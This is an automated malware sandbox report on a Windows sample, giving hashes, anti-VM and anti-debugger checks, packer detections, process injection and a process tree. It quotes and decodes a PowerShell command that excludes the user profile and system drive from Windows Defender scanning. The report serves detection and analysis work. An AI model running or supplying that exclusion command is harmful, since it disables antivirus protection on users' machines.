Analysis

max time kernel: 117s
max time network: 120s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
submitted: 15/07/2023, 22:08
Behavioral task: behavioral1
Sample: protmepls_BUT_BETTER_.exe
Resource: win7-20230712-en
General

Target: protmepls_BUT_BETTER_.exe
Size: 15.7MB
MD5: 3b175c33f73bcf59abb1b2b50fed49de
SHA1: 13145dc1dfa3e6e6f1b762f8a016c298d3de744b
SHA256: dcfbfc44d17764159537d568afbe19e7bd981f08888c1e9fce9024a993858c28
SHA512: c3f59ef7f099c06e7d5bb45b72e8f206153c0e45b487eb8b6b801542bf6845aa5ee54c1e4800801e503c477cc7068593a95cc37cd410dd8e021cbf948ba83deb
SSDEEP: 393216:5kLHj6tecPWNYP/VaMHAojfY4L4wAqvHV1opGH3u7n0dFsg0QQe+GrJG7bmxbo6:5ej6tenu/Pgojw8iqfTopL7yFaVe+GkW
Malware Config
Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | protmepls_BUT_BETTER_.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | protmepls_BUT_BETTER_.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | protmepls_BUT_BETTER_.exe

Executes dropped EXE (3 IoCs)
pid | Process
2108 | protmepls.exe
836 | OMM Loader.exe
1256 | Process not Found

Loads dropped DLL (3 IoCs)
pid | Process
924 | protmepls_BUT_BETTER_.exe
2108 | protmepls.exe
1256 | Process not Found

Obfuscated with Agile.Net obfuscator (3 IoCs)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource | yara_rule
behavioral1/files/0x0007000000012107-63.dat | agile_net
behavioral1/files/0x0007000000012107-59.dat | agile_net
behavioral1/files/0x0007000000012107-64.dat | agile_net

resource | yara_rule
behavioral1/memory/924-54-0x0000000000400000-0x0000000001F4A000-memory.dmp | themida
behavioral1/memory/924-56-0x0000000000400000-0x0000000001F4A000-memory.dmp | themida
behavioral1/memory/924-62-0x0000000000400000-0x0000000001F4A000-memory.dmp | themida

Checks whether UAC is enabled
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | protmepls_BUT_BETTER_.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
pid | Process
924 | protmepls_BUT_BETTER_.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid | Process
1500 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1500 | powershell.exe

Suspicious use of WriteProcessMemory (12 IoCs)
description | pid | Process | procid_target
PID 924 wrote to memory of 1500 | 924 | protmepls_BUT_BETTER_.exe | 28
PID 924 wrote to memory of 1500 | 924 | protmepls_BUT_BETTER_.exe | 28
PID 924 wrote to memory of 1500 | 924 | protmepls_BUT_BETTER_.exe | 28
PID 924 wrote to memory of 1500 | 924 | protmepls_BUT_BETTER_.exe | 28
PID 924 wrote to memory of 2108 | 924 | protmepls_BUT_BETTER_.exe | 30
PID 924 wrote to memory of 2108 | 924 | protmepls_BUT_BETTER_.exe | 30
PID 924 wrote to memory of 2108 | 924 | protmepls_BUT_BETTER_.exe | 30
PID 924 wrote to memory of 2108 | 924 | protmepls_BUT_BETTER_.exe | 30
PID 2108 wrote to memory of 836 | 2108 | protmepls.exe | 33
PID 2108 wrote to memory of 836 | 2108 | protmepls.exe | 33
PID 2108 wrote to memory of 836 | 2108 | protmepls.exe | 33
PID 2108 wrote to memory of 836 | 2108 | protmepls.exe | 33
Processes

1. C:\Users\Admin\AppData\Local\Temp\protmepls_BUT_BETTER_.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\protmepls_BUT_BETTER_.exe"
   PID: 924
   - Identifies VirtualBox via ACPI registry values (likely anti-VM)
   - Checks BIOS information in registry
   - Loads dropped DLL
   - Checks whether UAC is enabled
   - Suspicious use of NtSetInformationThreadHideFromDebugger
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AdwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAaABxACMAPgA="
      Decoded -EncodedCommand (base64-encoded UTF-16LE, decoded here for readability): <#wmg#>Add-MpPreference <#mwa#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#puf#> -Force <#thq#>
      (The command line names the System32 path while the executed image is the SysWOW64 binary: the 32-bit parent's request was redirected by WOW64 file system redirection.)
      PID: 1500
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

   2. C:\Users\Admin\protmepls.exe
      Command line: "C:\Users\Admin\protmepls.exe"
      PID: 2108
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Admin\AppData\Local\Temp\protmepls_1a292930-93cd-4359-8cae-971b56d16345\OMM Loader.exe
         Command line: "C:\Users\Admin\AppData\Local\Temp\protmepls_1a292930-93cd-4359-8cae-971b56d16345\OMM Loader.exe"
         PID: 836
         - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 144KB
MD5: 4b07d4daa90e051ca065e497c8d21346
SHA1: 248cce5809f7dbde17402ecb36bced1b071f9972
SHA256: 70795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA512: 0c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545

Filesize: 21.3MB
MD5: 1bc9df12a338938019d8a42237566b5f
SHA1: 4a1139848239d0fab1a07d2e328dc3732b92bdab
SHA256: f8759733e825b911c48356f73a1c4fe1b703ecad786a773a8963c4eeff4afc94
SHA512: 506b56b43d271f38eba4612f8310ee1ec2ccb413e105a4cd493165aa975e0431900eef0be0eaa25d01081b9ce8117121e08ebdd0cde47178a7560afd6161e465